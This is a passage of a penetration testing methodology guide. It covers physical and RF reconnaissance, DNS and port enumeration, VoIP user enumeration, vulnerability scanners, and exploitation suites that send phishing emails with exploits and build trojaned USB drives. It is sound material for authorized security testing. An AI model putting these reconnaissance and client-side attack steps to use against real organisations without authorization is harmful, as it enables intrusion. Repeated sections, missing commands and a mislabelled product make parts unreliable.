Surveillance/CCTV systems may be used to observe activities in and around a facility from a centralized area. Surveillance/CCTV systems may operate continuously or only when activated as required to monitor a particular event. More advanced Surveillance/CCTV systems utilize motion-detection devices to activate the system. IP-based Surveillance/CCTV cameras may be implemented for a more decentralized operation.

Access control devices

Access control devices enable access control to areas and/or resources in a given facility. Access control refers to the practice of restricting entrance to a property, a building, or a room to authorized persons. Access control can be achieved by a human (a security guard, or receptionist), through mechanical means such as locks and keys, or through technological means such as access control systems like the Access control vestibule.

Some readers may have additional features such as an LCD and function buttons for data collection purposes (i.e. clock-in/clock-out events for attendance reports), camera/speaker/microphone for intercom, and smart card read/write support. Observe and document the type, number, and locations of access control devices in use.

Environmental Design

Environmental design involves the surrounding environmental of a building, or facility. In the scope of Physical security, environmental design includes facilities geography, landscape, architecture, and exterior design.

Employee Behavior

Observing employees is often the one of the easier steps to perform. Employee actions generally provide insight into any corporate behaviors or acceptable norms. By observing, employees it is possible to determine procedures in use or establish ingress and egress traffic patterns. It is possible to utilize binoculars to observe any movement from a safe distance.

Dumpster diving

Traditionally, most targets dispose of their trash in either garbage cans or dumpsters. These may or may not be separated based upon the recyclability of the material. The act of dumpster diving is the practice of sifting through commercial or residential trash to find items that have been discarded by their owners, but which may be useful. This is often times an extremely dirty process that can yield significant results. Dumpsters are usually located on private premises and therefore may subject the assessment team to potentially trespassing on property not owned by the target. Though the law is enforced with varying degrees of rigor, ensure that this is authorized as part of the engagement. Dumpster diving per se is often legal when not specifically prohibited by law. Rather than take the refuse from the area, it is commonly accepted to simply photograph the obtained material and then return it to the original dumpster.

RF / Wireless Frequency scanning

A band is a section of the spectrum of radio communication frequencies, in which channels are usually used or set aside for the same purpose. To prevent interference and allow for efficient use of the radio spectrum, similar services are allocated in bands of non-overlapping ranges of frequencies.

Each of these bands has a basic band plan which dictates how it is to be used and shared, to avoid interference, and to set protocol for the compatibility of transmitters and receivers. Within the US, band plans are allocated and controlled by the Federal Communications Commission (FCC). The chart below illustrates the current band plans.

To avoid confusion, there are two bands that we could focus on our efforts on. The band plans that would in of interest to an attacker are indicated in the following chart.

A Radio Frequency (RF) site survey or wireless survey, sometimes called a wireless site survey, is the process of determining the frequencies in use within a given environment. When conducting a RF site survey, it’s very important to identify an effective range boundary, which involves determining the SNR at various points around a facility.

Screenshot Here

“Target Company” scanner

“Target Company” frequency

“Target Company” guard frequency

“Target Company” MHz

Press releases from radio manufactures and reseller regarding the target

Press releases from guard outsourcing companies talking about contracts with the target company

Frequency Usage

A frequency counter is an electronic instrument that is used for measuring the number of oscillations or pulses per second in a repetitive electronic signal. Using a Frequency counter or spectrum analyzer it is possible to identify the transmitting frequencies in use around the target facility. Common frequencies include the following:

A spectrum analyzer can be used to visually illustrate the frequencies in use. These are usually targeting specific ranges that are generally more focused than a frequency counter. Below is an output from a spectrum analyzer that can clearly illustrate the frequencies in use. The sweep range for this analyzer is 2399-2485 MHz.

All frequency ranges in use in and around the target should be documented.

Equipment Identification

As part of the on-site survey, all radios and antennas in use should be identified. Including radio make and model as well as the length and type of antennas utilized. A few good resources are available to help you identify radio equipment:

Identifying 802.11 equipment is usually much easier to accomplish, if not visually, then via RF emissions. For visual identification, most vendor websites can be searched to identify the specific make and model of the equipment in use.

In a passive manner, it is possible to identify at the manufacturer based upon data collected from RF emissions.

Airmon-ng

Airmon-ng is used to enable monitor mode on wireless interfaces. It may also be used to go back from monitor mode to managed mode. It is important to determine if our USB devices are properly detected. For this we can use lsusb, to list the currently detected USB devices.

As the figure illustrates, our distribution has detected not only the Prolific PL2303 Serial Port, where we have our USB GPS connected, but also the Realtek RTL8187 Wireless Adapter. Now that we have determined that our distribution recognizes the installed devices, we need to determine if the wireless adapter is already in monitor mode by running.

Screenshot Here

Screenshot Here

Once again, entering the airmon-ng command without parameters will show the interfaces status.

Airodump-ng

Airodump-ng is part of the Aircrack-ng is a network software suite. Specifically, Airodump-ng is a packet sniffer that places air traffic into Packet Capture (PCAP) files or Initialization Vectors (IVS) files and shows information about wireless networks.

Usage:

Airodump-ng will display a list of detected APs and a list of connected clients (“stations”).

Screenshot Here

Kismet-Newcore

Kismet-newcore is a network detector, packet sniffer, and intrusion detection system for 802.11 wireless LANs. Kismet will work with any wireless card which supports raw monitoring mode, and can sniff 802.11a, 802.11b, 802.11g, and 802.11n traffic.

Kismet is composed of 3 parts:

Drones: Capture the wireless traffic to report it to the server; they have to be started manually.

Server: Central place that connects to the drones and accepts client connections. It can also capture wireless traffic.

Client: The GUI part that will connect to the server.

Kismet has to be configured to work properly. First, we need to determine if it is already in monitor mode by running:

Screenshot Here

Screenshot Here

Kismet is able to use more than one interface like Airodump-ng. To use that feature, /etc/kismet/kismet.conf has to be edited manually as airmon-ng cannot configure more than one interface for kismet. For each adapter, add a source line into kismet.conf.

Typing, “kismet” in a console and hitting “Enter” will start up Kismet.

As described earlier Kismet consists of three components and the initial screen informs us that we need to either start the Kismet server or choose to use a server that has been started elsewhere. For our purposes. we will click “Yes” to start the Kismet server locally.

Kismet presents us with the options to choose as part of the server startup process.

Unless we configured a source in /etc/kismet/kismet.conf then we will need to specify a source from where we want to capture packets.

As referenced earlier, we created a monitor sub-interface from our wireless interface. For our purposes, we will enter “mon0”, though your interface may have a completely different name.

When Kismet server and client are running properly then wireless networks should start to show up. We have highlighted a WEP enabled network. There are numerous sorting options that you can choose from. We will not cover all the functionality of Kismet at this point, but if you’re not familiar with the interface you should play with it until you get comfortable.

inSSIDer

If you are used to using Netstumbler you may be disappointed to hear that it doesn’t function properly with Windows Vista and 7 (64-bit). That being said, all is not lost as there is an alternative that is compatible with Windows XP, Vista and 7 (32 and 64-bit). It makes use of the native Wi-Fi API and is compatible with most GPS devices (NMEA v2.3 and higher). InSSIDer has some features that make it the tool of choice if you’re using Windows. InSSIDer can track the strength of received signal in dBi over time, filter access points, and also export Wi-Fi and GPS data to a KML file to view in Google Earth.

External Footprinting

The External Footprinting phase of Intelligence Gathering involves collecting response results from a target based upon direct interaction from an external perspective. The goal is to gather as much information about the target as possible.

Identifying IP Ranges

For external footprinting, we first need to determine which one of the WHOIS servers contains the information we’re after. Given that we should know the TLD for the target domain, we simply have to locate the Registrar that the target domain is registered with.

WHOIS lookup

ICANN – http://www.icann.org

IANA – http://www.iana.com

NRO – http://www.nro.net

AFRINIC – http://www.afrinic.net

APNIC – http://www.apnic.net

ARIN – http://ws.arin.net

LACNIC – http://www.lacnic.net

RIPE – http://www.ripe.net

Once the appropriate Registrar was queried we can obtain the Registrant information. There are numerous sites that offer WHOIS information; however for accuracy in documentation, you need to use only the appropriate Registrar.

InterNIC – http://www.internic.net/ http://www.internic.net]

BGP looking glasses

It is possible to identify the Autonomous System Number (ASN) for networks that participate in Border Gateway Protocol (BGP). Since BGP route paths are advertised throughout the world we can find these by using a BGP4 and BGP6 looking glass.

BGP4 – http://www.bgp4.as/looking-glasses</u>

BPG6 – http://lg.he.net/

Active Reconnaissance

Manual browsing

Google Hacking – http://www.exploit-db.com/google-dorks

Passive Reconnaissance

Google Hacking – http://www.exploit-db.com/google-dorks

Active Footprinting

The active footprinting phase of Intelligence Gathering involves gathering response results from a target based upon direct interaction.

Zone Transfers

DNS zone transfer, also known as AXFR, is a type of DNS transaction. It is a mechanism designed to replicate the databases containing the DNS data across a set of DNS servers. Zone transfer comes in two flavors, full (AXFR) and incremental (IXFR). There are numerous tools available to test the ability to perform a DNS zone transfer. Tools commonly used to perform zone transfers are host, dig, and nmap.

Host

Dig

Reverse DNS

Reverse DNS can be used to obtain valid server names in use within an organizational. There is a caveat that it must have a PTR (reverse) DNS record for it to resolve a name from a provided IP address. If it does resolve then the results are returned. This is usually performed by testing the server with various IP addresses to see if it returns any results.

DNS Bruting

After identifying all the information that is associated with the client domain(s), it is now time to begin to query DNS. Since DNS is used to map IP addresses to hostnames, and vice versa we will want to see if it is insecurely configure. We will seek to use DNS to reveal additional information about the client. One of the most serious misconfigurations involving DNS is allowing Internet users to perform a DNS zone transfer. There are several tools that we can use to enumerate DNS to not only check for the ability to perform zone transfers, but to potentially discover additional host names that are not commonly known.

Fierce2 (Linux)

For DNS enumeration, there are two tools that are utilized to provide the desired results. The first that we will focus on is named Fierce2. As you can probably guess, this is a modification on Fierce. Fierce2 has lots of options, but the one that we want to focus on attempts to perform a zone transfer. If that is not possible, then it performs DNS queries using various server names in an effort to enumerate the host names that have been registered.

Screenshot Here

DNSEnum (Linux)

An alternative to Fierce2 for DNS enumeration is DNSEnum. As you can probably guess, this is very similar to Fierce2. DNSEnum offers the ability to enumerate DNS through brute forcing subdomains, performing reverse lookups, listing domain network ranges, and performing whois queries. It also performs Google scraping for additional names to query.

The command to run dnsenum is as follows:

Screenshot Here

Dnsdict6 (Linux)

Dnsdict6, which is part of the THC IPv6 Attack Toolkit, is an IPv6 DNS dictionary brute forcer. The options are relatively simple, but simply specify the domain and a dictionary-file.

Port Scanning

Nmap (Windows/Linux)

Nmap (“Network Mapper”) is the de facto standard for network auditing/scanning. Nmap runs on both Linux and Windows. Nmap is available in both command line and GUI versions. For the sake of this document, we will only cover the command line.

Nmap has dozens of options available. Since this section is dealing with port scanning, we will focus on the commands required to perform this task. It is important to note that the commands utilized depend mainly on the time and number of hosts being scanned. The more hosts or less time that you have to perform this tasks, the less that we will interrogate the host. This will become evident as we continue to discuss the options.

On large IP sets, those greater than 100 IP addresses, do not specify a port range. The command that will be utilized is as follows:

It should be noted that Nmap has limited options for IPv6. These include TCP connect (-sT), Ping scan (-sn), List scan (-sL) and version detection.

SNMP Sweeps

SNMP sweeps are performed too as they offer tons of information about a specific system. The SNMP protocol is a stateless, datagram oriented protocol. Unfortunately SNMP servers don’t respond to requests with invalid community strings and the underlying UDP protocol does not reliably report closed UDP ports. This means that “no response” from a probed IP address can mean either of the following:

machine unreachable

SNMP server not running

invalid community string

the response datagram has not yet arrived

SNMPEnum (Linux)

SNMPEnum is a perl script that sends SNMP requests to a single host, then waits for the response to come back and logs them.

SMTP Bounce Back

SMTP bounce back, also called a Non-Delivery Report/Receipt (NDR), a (failed) Delivery Status Notification (DSN) message, a Non-Delivery Notification (NDN) or simply a bounce, is an automated electronic mail message from a mail system informing the sender of another message about a delivery problem. This can be used to assist an attacker in fingerprint the SMTP server as SMTP server information, including software and versions, may be included in a bounce message.

Banner Grabbing

Banner Grabbing is an enumeration technique used to glean information about computer systems on a network and the services running its open ports. Banner grabbing is used to identify network the version of applications and operating system that the target host are running.

HTTP

Internal Footprinting

The Internal Footprinting phase of Intelligence Gathering involves gathering response results from a target based upon direct interaction from an internal perspective. The goal is to gather as much information about the target as possible.

Active Footprinting

The active footprinting phase of Intelligence Gathering involves gathering response results from a target based upon direct interaction.

Ping Sweeps

Active footprinting begins with the identification of live systems. This is usually performed by conducting a Ping sweep to determine which hosts respond.

Nmap (Windows/Linux)

Nmap (“Network Mapper”) is the de facto standard for network auditing/scanning. Nmap runs on both Linux and Windows. Nmap is available in both command line and GUI versions. For the sake of this document, we will only cover the command line.

Nmap has dozens of options available. Since this section is dealing with port scanning, we will focus on the commands required to perform this task. It is important to note that the commands utilized depend mainly on the time and number of hosts being scanned. The more hosts or less time that you have to perform this tasks, the less that we will interrogate the host. This will become evident as we continue to discuss the options.

Alive6 (Linux)

Alive6, which is part of the THC IPv6 Attack Toolkit, offers the most effective mechanism for detecting all IPv6 systems.

Alive6 offers numerous options, but can be simply run by just specifying the interface. This returns all the IPv6 systems that are live on the local-link.

Port Scanning

Nmap (Windows/Linux)

Nmap (“Network Mapper”) is the de facto standard for network auditing/scanning. Nmap runs on both Linux and Windows. Nmap is available in both command line and GUI versions. For the sake of this document, we will only cover the command line.

Nmap has dozens of options available. Since this section is dealing with port scanning, we will focus on the commands required to perform this task. It is important to note that the commands utilized depend mainly on the time and number of hosts being scanned. The more hosts or less time that you have to perform this tasks, the less that we will interrogate the host. This will become evident as we continue to discuss the options.

On large IP sets, those greater than 100 IP addresses do not specify a port range. The command that will be utilized is as follows:

It should be noted that Nmap has limited options for IPv6. These include TCP connect (-sT), Ping scan (-sn), List scan (-sL) and version detection.

SNMP Sweeps

SNMP sweeps are performed too as they offer tons of information about a specific system. The SNMP protocol is a stateless, datagram oriented protocol. Unfortunately SNMP servers don’t respond to requests with invalid community strings and the underlying UDP protocol does not reliably report closed UDP ports. This means that “no response” from a probed IP address can mean either of the following:

Machine unreachable

SNMP server not running

invalid community string

the response datagram has not yet arrived

SNMPEnum (Linux)

SNMPEnum is a perl script that sends SNMP requests to a single host, then waits for the response to come back and logs them.

Metasploit

Active footprinting can also be performed to a certain extent through Metasploit. Please refer to the Metasploit Unleashed course for more information on this subject.

Zone Transfers

DNS zone transfer, also known as AXFR, is a type of DNS transaction. It is a mechanism designed to replicate the databases containing the DNS data across a set of DNS servers. Zone transfer comes in two flavors, full (AXFR) and incremental (IXFR). There are numerous tools available to test the ability to perform a DNS zone transfer. Tools commonly used to perform zone transfers are host, dig and nmap.

Host

Dig

SMTP Bounce Back

SMTP bounce back, also called a Non-Delivery Report/Receipt (NDR), a (failed) Delivery Status Notification (DSN) message, a Non-Delivery Notification (NDN) or simply a bounce, is an automated electronic mail message from a mail system informing the sender of another message about a delivery problem. This can be used to assist an attacker in fingerprint the SMTP server as SMTP server information, including software and versions, may be included in a bounce message.

Reverse DNS

Reverse DNS can be used to obtain valid server names in use within an organizational. There is a caveat that it must have a PTR (reverse) DNS record for it to resolve a name from a provided IP address. If it does resolve then the results are returned. This is usually performed by testing the server with various IP addresses to see if it returns any results.

Banner Grabbing

Banner Grabbing is an enumeration technique used to glean information about computer systems on a network and the services running its open ports. Banner grabbing is used to identify network the version of applications and operating system that the target host are running.

HTTP

httprint

httprint is a web server fingerprinting tool. It relies on web server characteristics to accurately identify web servers, despite the fact that they may have been obfuscated by changing the server banner strings, or by plug-ins such as mod_security or servermask. httprint can also be used to detect web enabled devices which do not have a server banner string, such as wireless access points, routers, switches, cable modems, etc. httprint uses text signature strings and it is very easy to add signatures to the signature database.

VoIP mapping

VoIP mapping is where we gather information about the topology, the servers and the clients. The main goal here is to find live hosts, PBX type and version, VoIP servers/gateways, clients (hardware and software) types and versions. The majority of techniques covered here assume a basic understanding of the Session Initiation Protocol (SIP). There are several tools available to help us identify and enumerate VoIP enabled devices. SMAP is a tool which is specifically designed to scan for SIP enabled devices by generating SIP requests and awaiting responses. SMAP usage is as follows:

SIPScan is another scanner for sip enabled devices that can scan a single host or an entire subnet.

Extensions

Extensions are any client application or device that initiates a SIP connection, such as an IP phone, PC softphone, PC instant messaging client, or mobile device. The goal is to identify valid usernames or extensions of SIP devices. Enumerating extensions is usually a product of the error messages returned using the SIP method: REGISTER, OPTIONS, or INVITE. There are many tools that can be utilized to enumerate SIP devices. A tool that can be used to enumerate extensions is Svwar from the SIPVicious suite.

Svwar

Svwar is also a tool from the sipvicious suite allows to enumerate extensions by using a range of extensions or using a dictionary file svwar supports all the of the three extension enumeration methods as mentioned above, the default method for enumeration is REGISTER. Svwar usage is as follows:

enumIAX

If you’ve identified an Asterisk server is in use, you need to utilize a username guessing tool such as enumIAX to enumerate Asterisk Exchange protocol usernames. enumIAX is an Inter Asterisk Exchange version 2 (IAX2) protocol username brute-force enumerator. enumIAX may operate in two distinct modes; Sequential Username Guessing or Dictionary Attack. enumIAX usage is as follows:

Passive Reconnaissance

Packet Sniffing

Performing packet sniffing allows for the collection IP addresses and MAC addresses from systems that have packet traffic in the stream being analyzed. For the most part, packet sniffing is difficult to detect and so this form of recon is essentially passive and quite stealthy. By collecting and analyzing a large number of packets it becomes possible to fingerprint the operating system and the services that are running on a given device. It may also be possible to grab login information, password hashes, and other credentials from the packet stream. Telnet and older versions of SNMP pass credentials in plain text and are easily compromised with sniffing. Packet sniffing can also be useful in determining which servers act as critical infrastructure and therefore are of interest to an attacker.

Vulnerability Analysis

Vulnerability Analysis is used to identify and evaluate the security risks posed by identified vulnerabilities. Vulnerability analysis work is divided into two areas: Identification and validation. Vulnerability discovery effort is the key component of the Identification phase. Validation is reducing the number of identified vulnerabilities to only those that are actually valid.

Vulnerability Testing

Vulnerability Testing is divided to include both an Active and Passive method.

Active

Automated Tools

An automated scanner is designed to assess networks, hosts, and associated applications. There are a number of types of automated scanners available today, some focus on particular targets or types of targets. The core purpose of an automated scanner is the enumeration of vulnerabilities present on networks, hosts, and associated applications.

Network/General Vulnerability Scanners

Open Vulnerability Assessment System (OpenVAS) (Linux)

The Open Vulnerability Assessment System (OpenVAS) is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution. OpenVAS is a fork of Nessus that allows free development of a non-proprietary tool.

Screenshot Here

Screenshot Here

Screenshot Here

Screenshot Here

Screenshot Here Once you accept the certificate, OpenVAS will initialize and indicate the number of Found and Enabled plugins. This could take a while depending upon the number of plugins that need to be downloaded. Also, you need to ensure that you’ve added the appropriate /etc/hosts entries for both the IPv4 and IPv6 address. For example:

Screenshot Here

Screenshot Here

Screenshot Here

Screenshot Here

Screenshot Here

Screenshot Here

Screenshot Here

Nessus (Windows/Linux)

Nessus is a commercial automated scanning program. It is designed to detect potential vulnerabilities on the networks, hosts, and associated application being assessed. Nessus allows for custom policies to be utilized for specific evaluations. For non-Web applications, the policy that should be utilized is the “Only Safe Checks” policy (See Appendix A). For Web applications, the policy that should be utilized is the “Only Safe Checks (Web)” policy (See Appendix B).

Screenshot Here

Screenshot Here

Screenshot Here

Within Nessus, there are four main tabs available: Reports, Scans, Policies, and Users. Screenshot Here

You will create a new scan by clicking on the “Scans” option on the menu bar at the top and then click on the “+ Add” button on the right. The “Add Scan” screen will be displayed as follows: Screenshot Here

Once all these fields have been properly populated click “Launch Scan” to initiate the scan process.

A validation scan should be conducted weekly against <IP ADDRESS> using the “Validation Scan” policy (See Appendix C) to ensure that Nessus is performing scans in properly.

Once the scan has completed running, it will be visible in the Reports tab. To open the scan reports simply double-click on the appropriate completed scan file. This will provide us with some information about the scan as well as the results. Screenshot Here

Screenshot Here

NeXpose

Nessus is a commercial automated scanning product that provides vulnerability management, policy compliance and remediation management. It is designed to detect vulnerabilities as well as policy compliance on the networks, hosts, and associated web applications.

Screenshot Here

Screenshot Here Prior to running any NeXpose scan, the product should be validated to ensure that it has been properly updated with the latest signatures. This process is normally run as part of a scheduled task, but you can quickly validate that it the scanner is up to date by simply viewing the ‘News’ which will give you a log file of all the updates to the scan engine as well as any updated checks.

Within NeXpose, there are six main tabs available: Home, Assets, Tickets, Reports, Vulnerabilities, and Administration. Screenshot Here

Screenshot Here

Type a name for the target site. Then add a brief description for the site, and select a level of importance from the dropdown list. The importance level corresponds to a risk factor that NeXpose uses to calculate a risk index for each site. The ‘Very Low’ setting reduces a risk index to 1/3 of its initial value. The ‘Low’ setting reduces the risk index to 2/3 of its initial value. ‘High’ and ‘Very High’ settings increase the risk index to 2x and 3x times its initial value, respectively. A ‘Normal’ setting does not change the risk index.

Go to the Devices page to list assets for your new site. IP addresses and/or hostnames can be manually entered in the text box labeled Devices to scan. It is also possible to import a comma separated file that lists IP address and/or the host names of targets you want to scan. You do have to ensure that each address/hostname in the file appears on its own line.

If you need to exclude targets from a scan, the process is the sample however; it is performed under the area labeled ‘Devices to Exclude’.

Screenshot Here There are many templates available, however be aware that if you modify a template, all sites that use that scan template will use these modified settings. So ensure that modify an existing template with caution.

Finally, if you wish to schedule a scan to run automatically, click the check box labeled ‘Enable schedule’. The console displays options for a start date and time, maximum scan duration in minutes, and frequency of repetition. If the scheduled scan runs and exceeds the maximum specified duration, it will pause for an interval that you specify in the option labeled ‘Repeat every’. Select an option for what you want the scan to do after the pause interval.

You can set up alerts to inform you when a scan starts, stops, fails, or matches a specific criterion.

Screenshot Here

Screenshot Here

Screenshot Here

Screenshot Here

Once the scan has completed, you can view the results in several manners. It is possible to view the assets by sites, view assets by groups, view assets by operating systems, view assets by services, view assets by software, and view all assets.

By selecting the appropriate assets view you can select the results that you wish to view.

To create a report, click on the ‘Create Site Report’ button. This will take you to the ‘New Report’ ‘Configuration’ page.

Report configuration entails selecting a report template, assets to report on, and distribution options. You may schedule automatic reports for generation and distribution after scans or on a fixed calendar timetable; or you may run reports manually. After you go through all the following configuration steps and click ‘Save’, NeXpose will immediately start generating a report.

eEYE Retina

eEye Retina Vulnerability Assessment Scanner is a vulnerability scanner created by eEye Digital Security that is used to correlate and validate findings from Nmap and Nessus.

Screenshot Here

Clicking on the Options Actions section presents us with additional options related to the Discovery scan. These options include ICMP Discovery, TCP Discovery on Ports (enter in a comma separated list of port numbers, UPD Discovery, Perform OS Detection, Get Reverse DNS, Get NetBIOS Name, and Get MAC Address. Select the appropriate options for the scan desired.

To run the Discovery scan immediately click “Discover.” To run the Discovery scan at a later point in time or on a regular schedule, click “Schedule.” Retina displays your results in the Results table as it scans the selected IP(s). In order to get the results in a format that we can use, we need to select the scan results and click “Generate” to export the results in XML format.

While Discovery Scans may be useful, the majority of our tasks will take place in the Audit Interface. This is very similar to the Discovery Scan interface; however it does have a few more options.

The Targets section is similar though there is an additional section that allows us to specify the Output Type, Name, and Job Name.

This section is important to complete, as this is how the scan results will be saved. If you do not change this information then you could potentially overwrite someone else’s scan results. By default, these are saved to the following directory:

This is important to note, as you will need to copy these from this location to your working directory.

Screenshot Here

Screenshot Here

Screenshot Here

Perform OS Detection

Get Reverse DNS

Get NetBIOS Name

Get MAC Address

Perform Traceroute

Enable Connect Scan

Enable Force Scan

Randomize Target List

Enumerate Registry via NetBIOS

Enumerate Users via NetBIOS

Enumerate Shares via NetBIOS

Enumerate Files via NetBIOS

Enumerate Hotfixes via NetBIOS.

Enumerate Named Pipes via NetBIOS

Enumerate Machine Information via NetBIOS

Enumerate Audit Policy via NetBIOS

Enumerate Per-User Registry Settings via NetBIOS

Enumerate Groups via NetBIOS

Enumerate Processes via NetBIOS

Enumerate a maximum of 100 users

At this point we are ready to actually perform the Audit Scan. Click the Scan button to start the Audit Scan immediately. To perform the scan at a later point in time or on a regular schedule, click “Schedule.”

Note: Automated tools can sometimes be too aggressive by default and need to be scaled back if the customer is affected.

Retina displays your results in the Results table as it scans the selected IP(s).

Qualys

<Contribution Needed>

Core IMPACT

Core IMPACT is a penetration testing and exploitation toolset used for testing the effectiveness of your information security program. Core IMPACT automates several difficult exploits and has a multitude of exploits and post exploitation capabilities.

Core IMPACT Web

1) Information Gathering. As always, the first step information gathering. Core organizes web attacks into scenarios. You can create multiple scenarios and test the same application with varying settings, segment a web application, or to separate multiple applications. a) Select the target, either by providing a url or telling Core to choose web servers discovered during the network RPT b) Choose a method for exploring the site, automatic or interactive.

Screenshot Here

Screenshot Here

The attack can be directed to a scenario or individual pages. Each type of exploit has its own configuration wizard. SQL Injection tests can be performed on request parameters and/or request cookies. There are three different levels of injection attacks FAST: quickly runs the most common tests, NORMAL: runs the tests that are in the FAST plus some additional tests FULL: runs all tests (for details on what the difference tests check for, select the modules tab, navigate to the Exploits | SQL Injection section and view the contents of the SQL Injection Analyzer paying attention to the fuzz_strings). Adding information about known custom error pages and any session arguments will enhance testing. For XSS attacks, configure the browser XSS should be tested for, whether or not to evaluate POST parameters and whether to look for Persistent XSS vulnerabilities. For PHP remote file injection vulnerabilities, the configuration is either yes try to exploit or no, donít. Monitor the module progress in the Executed Modules pane. If the WebApps Attack and Penetration is successful, then Core Agents (see note on agents in Core network RPT) will appear under vulnerable pages in the Entity View.

Can leverage XSS exploits to assist with Social Engineering awareness tests. The wizard will guide the penetration tester though the process of leveraging the XSS vulnerability to your list of recipients from the client side information gathering phase.

Will check for sensitive information, get database logins and get the database schema for pages where SQL was successfully exploited. Command and SQL shells may also be possible.

The RFI agent(PHP) can be used to gather information, for shell access, or to install the full Core Agent.

Core IMPACT WiFi

Core Impact contains a number of modules for penetration testing an 802.11 wireless network and/or the security of wireless clients. In order to use the wireless modules you must use an AirPcap adapter available from www.cacetech.com.

5) Reporting. Reports about all the discovered WiFi networks , summary information about attacks while using a Fake Access Point and results of Man In The Middle (MiTM) attacks can be generated.

Core IMPACT Client Side

Core Impact can perform controlled and targeted social engineering attacks against a specified user community via email, web browsers, third-party plug-ins, and other client-side applications.

1) As always, the first step information gathering. Core Impact has automate modules for scraping email addresses our of search engines (can utilize search API keys), PGP, DNS and WHOIS records, LinkedIn as well as by crawling a website, contents and metadata for Microsoft Office Documents and PDFs , or importing from a text file generated using source as documented in the intelligence gather section of the PTES. 2) With the target list complete, the next step is to create the attack. Core supports multiple types of attacks, including single exploit, multiple exploits or a phishing only attack

Depending on which option is chosen the wizard will walk you through choosing the exploit, setting the duration of the client side test, and choosing an email template (note: predefined templates are available, but message should be customized to match target environment!) .Web links can be obfuscated using tinyURL, Bit.Ly or Is.gd. After setting the options for the email server the Core Agent connect back method (HTTP, HTTPS, or other port), and choosing whether or not to run a module on successful exploitation or to try to collect smb credentials, the attack will start. Specific modules can be run instead of using the wizard by choosing the modules tab

Monitor the Executed Modules pane to see the progress of the client side attack. As agents are deployed, they will be added to the network tab. See the network RPT section of the PTES for details on completing the local information gathering, privilege escalation and clean up tasks.

It is also possible to create a trojaned USB drive that will automatically install the Core agent.

Core Web

coreWEBcrawl

With interactive, you set your ”browser” to use Core as a proxy and then navigate through the web application. Further customized discovery modules like checking for backup and hidden pages are available on the modules tab. Screenshot Here

3) Web Apps Browser attack. Can leverage XSS exploits to assist with Social Engineering awareness tests. The wizard will guide the penetration tester though the process of leveraging the XSS vulnerability to your list of recipients from the client side information gathering phase.

5) Report Generation. Select from a variety of reports like executive, vulnerability and activity reports.

Core WiFi

Core Impact contains a number of modules for penetration testing an 802.11 wireless network and/or the security of wireless clients. In order to use the wireless modules you must use an AirPcap adapter available from www.cacetech.com. <corewireless.jpg> 1) Information Gathering. Select the channels to scan to discover access points or capture wireless packets.

5) Reporting. Reports about all the discovered WiFi networks , summary information about attacks while using a Fake Access Point and results of Man In The Middle (MiTM) attacks can be generated.

SAINT

SAINT Professional is a commercial suite combining two distinct tools rolled into one easy to use management interface; SAINTscanner and SAINTexploit providing a fully integrated vulnerability assessment and penetration testing toolkit.

SAINTscanner

Once logged in you immediately enter the SAINTscanner page with the Penetration Testing (SAINTXploit) tab easily available and visible. It is possible to login remotely to SAINT, by default this is over port 1414 and has those hosts allowed to connect have to be setup via Options, startup options, Category remote mode, subcategory host options: Screenshot Here SAINT_Remote_host.png refers (included). Configuration of scanning options should now be performed which is accessed by Options, scanning options, Category scanning policy. Each sub category needs to be addressed to ensure that the correct default scanning parameters are set i.e. using nmap rather than the in-built SAINT port scanner and which ports to probe, that dangerous checks are disabled (if required) and that the required items for compliance and audit are enabled for reporting i.e. anti-virus, age of definition check etc. Screenshot Here SAINT_scanning_options.png refers (included). Note: – The target restrictions sub-category should be amended if any hosts are not to be probed. The most import scanning option is Category Scanning policy, sub-category probe options, option, what scanning policy should be used, the scan required is selected or a custom policy built-up to suit the actual task Screenshot here SAINT_policy_setup.png refers (included). Having configured all the options required the actual process of carrying out a scan can be addressed. Step 1 Insert IP Range/ Address or Upload Target List Step 2 Type in credentials Screenshot here SAINT_scansetup1.png refers (included). Step 3 Select Scan Policy Type Step 4 Determine Firewall settings for Target Step 5 Select Scan Now Screenshot here SAINT_scansetup2.png refers (included).

SAINTexploit

Different levels of penetration tests can be carried out:

Conducting a test is fairly straight forward, once any prior configuration has been carried out, callback ports, timeouts etc. Just select the Pen Test icon then go through the following 4 steps. Once complete select run pen test now.

Screenshot here SAINT_pen1.png refers (included).

SAINT_pen2.png Screenshot here SAINT_pen2.png refers (included).

Command Prompt. File and Upload Manager. Screenshot Taker Tunnel.

Custom Client Side attacks These can be performed by using the exploits icon, selecting exploits, expanding out the client list and clicking on the appropriate exploit that you wish to utilise against the client (run now) Screenshot here SAINT_client1.png refers (included) Select, port the client is to connect to, the shell port and the target type. Annotate any specific mail from and to parameters Screenshot here SAINT_client2.png refers (included) Type in the subject, either select a predefined template and alter the message to suit Screenshot here SAINT_client3.png refers (included) A sample pre-defined template is available which looks very realistic Screenshot here SAINT_client4.png refers (included) Selecting run now will start the exploit server against the specified target host Screenshot here SAINT_client5.png refers (included) If a client click the link in the email they have just been sent, and they are exploitable, the host will appear in the connections tab and can then be interacted with as above.

Step 1 From the SAINT GUI, go to Data, and from there go to SAINTwriter. Step 2 Read the descriptions of the pre-configured reports and select the one which best suits your needs. Screenshot here SAINT_writer.png refers (included). A sample report is available here and here SAINT_report1.pdf and SAINT_report2.pdf refer (included)

Web Application Scanners

General Web Application Scanners

WebInspect (Windows)

HP’s WebInspect application security assessment tool helps identify known and unknown vulnerabilities within the Web application layer. WebInspect can also help check that a Web server is configured properly, and attempts common web attacks such as parameter injection, cross-site scripting, directory traversal, and more

Screenshot Here

Screenshot Here

In the Scan Name box, enter a name or a brief description of the scan. Next you need to select one an assessment mode. The options available are Crawl Only, Crawl and Audit, Audit Only, and Manual. The “Crawl Only” option completely maps a site’s tree structure. It is possible after a crawl has been completed, to click “Audit” to assess an application’s vulnerabilities. “Crawl and Audit” maps the site’s hierarchical data structure, and audits each page as it is discovered. This should be used when assessing extremely large sites. “Audit Only” determines vulnerabilities, but does not crawl the web site. The site is not assessed when this option is chosen. Finally, “Manual” mode allows you to navigate manually to sections of the application. It does not crawl the entire site, but records information only about those resources that you encounter while scanning a Site manually navigating the site. Use this option if there are credentialed scans being performed. Also, ensure that you embed the credentials in the profile settings.

It is recommended to crawl the client site first. This allows the opportunity to identify any forms that need to be filtered during the audit as well as identify directories/file names (in some cases, even the profiler) that need to be ignored for a scan to complete.

